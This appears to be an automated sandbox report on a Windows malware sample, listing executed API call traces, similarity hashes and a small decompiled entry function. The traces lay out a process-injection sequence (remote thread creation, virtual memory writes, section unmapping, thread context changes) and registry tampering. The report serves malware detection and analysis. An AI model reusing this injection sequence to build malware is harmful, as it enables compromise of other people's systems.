    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}
APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
